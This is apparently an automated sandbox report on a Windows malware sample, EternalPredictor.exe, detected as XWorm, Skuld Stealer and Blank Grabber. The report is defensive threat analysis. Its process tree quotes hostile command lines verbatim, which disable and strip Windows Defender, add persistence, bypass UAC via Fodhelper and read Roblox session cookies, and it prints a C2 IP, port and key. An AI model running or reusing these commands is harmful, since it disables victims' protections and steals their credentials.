
Windows Analysis Report
EternalPredictor.exe

Overview

General Information

Sample name: EternalPredictor.exe
Analysis ID: 1557106
MD5: 7d207c243b33d6f3d78acadffd95ae0e
SHA1: a3ad8109c208b12d35359e78f4ebc23ed79ccf24
SHA256: dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30
Tags: exe, user-aachum

Detection

Blank Grabber, Skuld Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
UAC bypass detected (Fodhelper)
Yara detected Blank Grabber
Yara detected Skuld Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Protects its processes via BreakOnTermination flag
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • EternalPredictor.exe (PID: 2852 cmdline: "C:\Users\user\Desktop\EternalPredictor.exe" MD5: 7D207C243B33D6F3D78ACADFFD95AE0E)
    • eternal.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Roaming\eternal.exe" MD5: 7439CC991A9A756C41153B8E9121BAAB)
      • schtasks.exe (PID: 4424 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • skuld.exe (PID: 3872 cmdline: "C:\Users\user\AppData\Roaming\skuld.exe" MD5: DBBD2127D1030E4C9548FDF7DE9983A7)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 6876 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • attrib.exe (PID: 6088 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • WMIC.exe (PID: 1816 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • program.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Roaming\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
      • program.exe (PID: 2360 cmdline: "C:\Users\user\AppData\Roaming\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
        • cmd.exe (PID: 4920 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5520 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4940 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2212 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4004 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6088 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7400 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7500 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7908 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7952 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 8000 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7976 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 7960 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 payload omitted]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7984 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
            • csc.exe (PID: 7448 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • cvtres.exe (PID: 2736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • consent.exe (PID: 7816 cmdline: consent.exe 6092 324 0000019985E22B80 MD5: DD5032EF160209E470E2612A8A3D5F59)
          • svchost.exe (PID: 6092 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 5032 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • getmac.exe (PID: 5496 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
        • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7480 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7428 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 3828 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 4568 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7976 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 1240 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 5268 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 1816 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 3648 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 2848 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 2100 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7832 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3832 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7344 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
        • Conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 7084 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 7439CC991A9A756C41153B8E9121BAAB)
  • SecurityHealthSystray.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: DBBD2127D1030E4C9548FDF7DE9983A7)
    • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7980 cmdline: cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • fodhelper.exe (PID: 8108 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 7844 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 7840 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • SecurityHealthSystray.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: DBBD2127D1030E4C9548FDF7DE9983A7)
          • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 7439CC991A9A756C41153B8E9121BAAB)
  • cleanup

{"C2 url": ["147.185.221.23"], "Port": 33942, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\XClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xfc4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfceb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfe00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xebac:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\eternal.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\eternal.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xfc4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfceb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfe00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xebac:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
(4 further entries not shown)

Source | Rule | Description | Author | Strings
00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(28 further entries not shown)

Source | Rule | Description | Author | Strings
0.2.EternalPredictor.exe.3d22330.2.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.EternalPredictor.exe.3d22330.2.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xfc4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfceb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfe00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xebac:$cnc4: POST / HTTP/1.1
0.2.EternalPredictor.exe.3d10cf0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.EternalPredictor.exe.3d10cf0.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xde4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xdeeb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe000:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xcdac:$cnc4: POST / HTTP/1.1
2.0.eternal.exe.bc0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(17 further entries not shown)

                        System Summary

                        barindex
                        Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7840, ParentProcessName: fodhelper.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" , ProcessId: 7812, ProcessName: SecurityHealthSystray.exe
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\skuld.exe, ProcessId: 3872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", ProcessId: 4920, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 